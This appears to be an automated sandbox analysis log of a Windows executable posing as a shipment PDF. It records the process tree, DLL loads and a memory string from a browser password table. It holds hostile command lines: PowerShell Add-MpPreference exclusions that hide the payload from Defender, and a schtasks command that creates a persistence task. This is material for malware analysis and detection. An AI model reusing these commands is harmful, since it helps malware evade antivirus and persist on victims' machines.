                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5088:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6088:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1672:120:WilError_03
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\tmp56D.tmpJump to behavior
                  Source: Shipment 990847575203.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Shipment 990847575203.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: MSBuild.exe, 00000009.00000002.3578857774.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.0000000002B84000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003308000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.000000000332E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.000000000333A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: Shipment 990847575203.pdf.exeReversingLabs: Detection: 65%
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeFile read: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe"
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FZcXKpA.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp56D.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\FZcXKpA.exe C:\Users\user\AppData\Roaming\FZcXKpA.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp3382.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FZcXKpA.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp56D.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp3382.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: iconcodecservice.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: iconcodecservice.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
